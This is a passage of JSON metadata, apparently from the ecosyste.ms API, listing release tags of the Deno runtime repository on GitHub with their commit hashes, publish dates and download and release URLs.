.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposit